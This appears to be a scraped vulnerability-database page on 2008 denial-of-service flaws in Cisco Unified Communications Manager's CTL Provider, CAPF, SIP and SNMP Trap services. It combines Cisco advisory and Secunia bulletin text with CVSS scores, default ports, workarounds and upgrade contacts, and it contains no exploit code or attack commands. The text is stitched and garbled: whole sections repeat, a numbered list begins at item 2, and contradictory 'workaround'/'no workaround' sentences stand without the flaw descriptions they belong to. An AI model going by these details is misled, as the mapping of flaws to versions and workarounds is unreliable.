CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0209 | CVE-2008-1745 | Cisco Unified Communications Manager (CUCM) Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Cisco Unified Communications Manager (CUCM) 5.x before 5.1(2) and 6.x before 6.1(1) allows remote attackers to cause a denial of service (service interruption) via a SIP JOIN message with a malformed header, aka Bug ID CSCsi48115. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsi48115 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability.
Certificate Authority Proxy Function Related Vulnerability
The Certificate Authority Proxy Function (CAPF) service of Cisco
Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a
vulnerability when handling malformed input that may result in a DoS
condition. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
These vulnerabilities were discovered internally by Cisco.
Status of this Notice: FINAL
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2008-May-14 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at http://www.cisco.com/go/psirt.
-----BEGIN PGP SIGNATURE-----
iD8DBQFIKw3c86n/Gc8U/uARAo4iAJ461QSdwp9yXivfv/yWe4Xlj2wNaACcD/nW
GpnghuWFfH2gIjp6Yk6857c=
=L6xn
-----END PGP SIGNATURE-----
| VAR-200805-0210 | CVE-2008-1746 | Cisco Unified Communications Manager (CUCM) Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
The SNMP Trap Agent service in Cisco Unified Communications Manager (CUCM) 4.1 before 4.1(3)SR6, 4.2 before 4.2(3)SR3, 4.3 before 4.3(2), 5.x before 5.1(3), and 6.x before 6.1(1) allows remote attackers to cause a denial of service (core dump and service restart) via a series of malformed UDP packets, as demonstrated by the IP Stack Integrity Checker (ISIC), aka Bug ID CSCsj24113. Cisco Unified Communications Manager (CUCM) There is a service disruption (DoS) Vulnerabilities exist. The problem is Bug ID : CSCsj24113 It is a problem.Please refer to the “Overview” for the impact of this vulnerability.
These issues affect the following components:
Certificate Trust List (CTL) Provider
Certificate Authority Proxy Function (CAPF)
Session Initiation Protocol (SIP)
Simple Network Management Protocol (SNMP) Trap
An attacker can exploit these issues to cause denial-of-service conditions in the affected application. CISCO AKA BUG number CSCsj24113. ----------------------------------------------------------------------
Secunia Network Software Inspector 2.0 (NSI) - Public Beta
The Public Beta has ended. Thanks to all that participated.
This vulnerability is reported in version 5.x.
2) Another error within the CTL Provider service can be exploited to
consume large amounts of memory resources via a series of specially
crafted packets sent to default port 2444/TCP.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, and 4.3.
This vulnerability is reported in versions 5.x and 6.x.
This vulnerability is reported in versions 4.1, 4.2, 4.3, 5.x, and
6.x.
SOLUTION:
Update to the fixed versions.
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor.
ORIGINAL ADVISORY:
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. These
vulnerabilities were discovered internally by Cisco. Workarounds that mitigate some of these
vulnerabilities are available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20080514-cucmdos.shtml. The software version
can also be determined by running the command show version active via
the command line interface (CLI). No other Cisco products are currently known to be
affected by these vulnerabilities.
Details
=======
Cisco Unified Communications Manager is the call processing component
of the Cisco IP Telephony solution that extends enterprise telephony
features and functions to packet telephony network devices, such as
IP phones, media processing devices, voice-over-IP (VoIP) gateways,
and multimedia applications. The CTL Provider service listens
by default on TCP port 2444 and is user configurable. The CTL
Provider service is enabled by default. There is a workaround for
this vulnerability. The CTL Provider service listens by default on
TCP port 2444 and is user configurable. There is a workaround for
this vulnerability.
Certificate Authority Proxy Function Related Vulnerability
The Certificate Authority Proxy Function (CAPF) service of Cisco
Unified Communications Manager versions 4.1, 4.2 and 4.3 contain a
vulnerability when handling malformed input that may result in a DoS
condition. The CAPF service listens by default on TCP port 3804 and
is user configurable. The CAPF service is disabled by default. There
is a workaround for this vulnerability. There is no workaround for this
vulnerability. There is no workaround for
this vulnerability. There is no workaround for
this vulnerability. The SNMP Trap Agent service listens by default on
UDP port 61441. There is a workaround for this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCsj80609 - Memory Leak Due to TCPFUZZ on Port 2444 (CTLProvider)
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi98433 - CTLProvider leaks memory in certain scenarios
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46770 - CAPF crash with network traffic
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsi48115 - CM 6.1 stops providing service when receiving malformed Join sip-header
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsk46944 - CCM service restarts on receiving a valid SIP Packet
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsl22355 - CCM does not validate SIP URL input properly
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCsj24113 - CCM Process Coredump/Restart During ISIC Execution Against Port 61441
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the vulnerabilities in this advisory may
result in the interruption of voice services.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance. It can downloaded at the
following link:
http://www.cisco.com/pcgi-bin/tablebuild.pl/callmgr-61?psrtdcat20e2
Workarounds
===========
CTL Provider Related Vulnerabilities
To mitigate against the CTL Provider service vulnerabilities
(CSCsj80609 and CSCsi98433), system administrators can disable the
CTL Provider service if it is not needed. The CTL Provider service is controlled via the Cisco CTL
Provider menu selection.
It is possible to mitigate the CTL Provider vulnerabilities by
implementing filtering on screening devices. If the CTL Provider
service is enabled, permit access to TCP port 2444 only between the
Cisco Unified Communications Manager systems where the CTL Provider
service is active and the CTL Client, usually on the administrator's
workstation, to mitigate the CTL Provider service overflow.
Note: It is possible to change the default port of the CTL Provider
service (TCP port 2444). If changed, filtering should be based on the
values used.
CAPF Related Vulnerability
To mitigate against the CAPF service vulnerability (CSCsk46770),
system administrators can disable the CAPF service if it is not
needed. If phones are not
configured to use certificates, then the CAPF service can be
disabled. The CAPF service is controlled by the Cisco Certificate
Authority Proxy Function menu selection.
It is possible to mitigate the CAPF vulnerability by implementing
filtering on screening devices. If the CAPF service is enabled,
permit access to TCP port 3804 only from networks that contain IP
phone devices needing to utilize the CAPF service.
SIP-Related Vulnerabilities
It is possible to mitigate the SIP vulnerabilities by implementing
filtering on screening devices.
SNMP Trap-Related Vulnerability
To mitigate against the SNMP Trap service vulnerability (CSCsj24113),
system administrators can disable the SNMP Trap service. To disable the
Windows SNMP service, navigate to Start > Programs > Administrative
Tools > Services, and stop the SNMP Service.
Note: The SNMP Trap Service listed in the Windows Service
configuration screen is not applicable to this vulnerability and
disabling it does not provide any benefit as a workaround for this
vulnerability.
It is possible to mitigate the SNMP Trap service vulnerability by
implementing filtering on screening devices. Permit access to UDP
port 61441 only from management systems that need access to the SNMP
Trap service. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
ustomers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http:/ www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
